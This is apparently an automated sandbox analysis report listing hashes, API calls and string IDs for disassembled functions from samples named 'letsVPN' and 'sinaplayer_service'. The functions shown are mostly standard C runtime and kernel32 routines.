                                                                                                                                                                                                    • Instruction ID: 9c91fa3ca3c0817a55952564f80012bba0731b32b0c8655ea8f0e7c389f5f77d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a92920c7bc4735bc74e8adb372b0bc37048f94f376ff593bf359793745f81a4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7715E32610AC89AEBA1DF34D8407D93761FB597A8F508215FA6D1BAEADF34C349C341
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind
                                                                                                                                                                                                    • String ID: $csm
                                                                                                                                                                                                    • API String ID: 451473138-717980254
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                    • API String ID: 2118026453-820377970
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringTypefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3522554955-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$Copy_strFileHeaderRaiseThrow_pclosefgetsstd::exception::_std::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1743889360-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2615622293-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3089783468-0
                                                                                                                                                                                                    • Opcode ID: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction ID: c157a4136c12881e15d1d6466a1d1e032bd19282ed3789510d37b6ed984cd8dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211E732204B8C41FBE78615B4443FD67A1AB9A7D4F18C129FA96077C9CE68C74DD741
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand$_getptd
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 2986147986-2662692612
                                                                                                                                                                                                    • Opcode ID: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
                                                                                                                                                                                                    • Instruction ID: f4cbb9994f2192c02038a558b7f24809a3cbc7a7a85d0f49fb9528de59c6dda1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A1129323249D885EB9FCA2F90023DC7659E38DBC0F448025AA46877C5DE29C6998342
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread__addlocaleref_calloc_crt_initptdfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 144977139-0
                                                                                                                                                                                                    • Opcode ID: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction ID: dd0f1f0c231c5fc80c7439be1b3e8a88326aa7477beda5119a12924904dd7238
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F0BB30205E48C6FBDBAB21C8143E951819B4C7E1F44C624B5294A3D2FE688B5D8360
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _amsg_exit_getptd$Ex_nolock_getptd_noexit_updatetlocinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3801014656-0
                                                                                                                                                                                                    • Opcode ID: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction ID: d4aacb6000a69ceffea1ebe97908f6bebd0b7ae2b0ac0e702d7cc498c4538d71
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F0303161190882FBDAAB5588427E82269EB4CBC4F0C8235FA18473D2DF148748C711
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_lseeki64_write
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2577073331-3916222277
                                                                                                                                                                                                    • Opcode ID: 75876cad2acb07627db3e6d8a17810d58ab564f56b183f15df871a460318ffe0
                                                                                                                                                                                                    • Instruction ID: bbc1748b0e4912f4bbdfd24d31f7153fcdc314768b3959c9ff65e79e13f88314
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75876cad2acb07627db3e6d8a17810d58ab564f56b183f15df871a460318ffe0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11B172308F488ADB978F29D4403AC7761FB4DBE4F589206EA69433D9DE38CB599700

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:0%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:53.5%
                                                                                                                                                                                                    Total number of Nodes:71
                                                                                                                                                                                                    Total number of Limit Nodes:1

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,6D0ACA0D,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0AD411
                                                                                                                                                                                                    • __initp_misc_winsig.LIBCMT ref: 6D0AD42C
                                                                                                                                                                                                      • Part of subcall function 6D0AC60E: EncodePointer.KERNEL32(?,6D0AD437,00000000,00000000,00000000,00000000,00000000,?,6D0ACA0D,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0AC613
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000), ref: 6D0AD448
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D0AD45C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D0AD46F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D0AD482
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D0AD495
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D0AD4A8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D0AD4BB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D0AD4CE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6D0AD4E1
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D0AD4F4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D0AD507
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D0AD51A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D0AD52D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D0AD540
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D0AD553
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D0AD566
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6D0AD579
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6D0AD58C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6D0AD59F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 6D0AD5B2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 6D0AD5C5
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6D0AD5D8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 6D0AD5EB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 6D0AD5FE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 6D0AD611
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6D0AD624
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 6D0AD637
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 6D0AD64A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 6D0AD65D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 6D0AD670
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 6D0AD683
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 6D0AD696
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 6D0AD6A9
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 6D0AD6BC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$EncodePointer$HandleModule__initp_misc_winsig
                                                                                                                                                                                                    • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                                                                                                                                                                    • API String ID: 1581159588-2934716456
                                                                                                                                                                                                    • Opcode ID: 782c804ff5e80971a94adfbcc74c6f00bdc1b9dcd54343ffd2b704ecf685e36c
                                                                                                                                                                                                    • Instruction ID: aa0b94a957df22230610cd48ec002b70c2ccce1577efc2dabbc7e2b5d93b3e66
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 782c804ff5e80971a94adfbcc74c6f00bdc1b9dcd54343ffd2b704ecf685e36c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB6168F2810219AAAB40AFB5AC54F5BBBF8FBD7700304581AE624D3552F7F9D0428F65
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(?,6D095F14), ref: 6D095CC5
                                                                                                                                                                                                    • towlower.MSVCR120(00000000), ref: 6D095CF2
                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6D095D10
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 6D095D4F
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 6D095D66
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 6D095DCE
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 6D095DE5
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 6D095E4D
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 6D095E64
                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 6D095EB8
                                                                                                                                                                                                      • Part of subcall function 6D09619F: wcsrchr.MSVCR120(6D095ECA,0000002E,00000000,?,?,6D095ECA,00000400,?), ref: 6D0961FA
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.exe,00000000,?,?,6D095ECA,00000400,?), ref: 6D09620D
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.cmd,00000000,?,?,6D095ECA,00000400,?), ref: 6D09621E
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.bat,00000000,?,?,6D095ECA,00000400,?), ref: 6D09622F
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.com,00000000,?,?,6D095ECA,00000400,?), ref: 6D096240
                                                                                                                                                                                                    • _getdrive.MSVCR120 ref: 6D0AF5D8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0AF5E2
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0AF6E1
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0AF6EB
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D43BF
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D43C6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D43D1
                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 6D0D43E1
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0D4400
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4523
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D453A
                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 6D0D4549
                                                                                                                                                                                                      • Part of subcall function 6D095F93: _get_daylight.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096067
                                                                                                                                                                                                      • Part of subcall function 6D095F93: _get_dstbias.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096079
                                                                                                                                                                                                      • Part of subcall function 6D095F93: _get_timezone.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D09608B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$System$File_wcsicmp$FindLocalSpecific_errno$Close__doserrno$DriveErrorFirstLastType__dosmaperr_get_daylight_get_dstbias_get_timezone_getdrive_invalid_parameter_noinfo_wcspbrkfreetowlowerwcsrchr
                                                                                                                                                                                                    • String ID: ./\
                                                                                                                                                                                                    • API String ID: 4076242085-3176372042
                                                                                                                                                                                                    • Opcode ID: dc3a21a7c30a111051fde385b2f1785753128e6d79ec8075a0b9a08eebbcaf12
                                                                                                                                                                                                    • Instruction ID: daa1ea2f65b21a1adbc64c6e4d547d6124e4d682b81d554d6b8458d269e7f6da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc3a21a7c30a111051fde385b2f1785753128e6d79ec8075a0b9a08eebbcaf12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAC1C3B18086299FEB208F65CC48BBAB7FCBF09315F10469AF659D6191E734C980DF64
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000007,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8D7E
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • __tzname.MSVCR120(6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8D87
                                                                                                                                                                                                    • _get_timezone.MSVCR120(0000003B,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8D93
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8DA5
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8DB7
                                                                                                                                                                                                    • ___lc_codepage_func.MSVCR120(6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8DC5
                                                                                                                                                                                                      • Part of subcall function 6D097060: strlen.MSVCR120(00000000,00000064,00000000,?,6D0A8DEB,6D0A8F1C,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000), ref: 6D09707C
                                                                                                                                                                                                      • Part of subcall function 6D097060: strlen.MSVCR120(00000000,00000064,00000000,?,6D0A8DEB,6D0A8F1C,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000), ref: 6D09708B
                                                                                                                                                                                                      • Part of subcall function 6D097060: _mbsnbicoll.MSVCR120(00000000,00000000,00000000,00000064,00000000,?,6D0A8DEB,6D0A8F1C,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190), ref: 6D0970A7
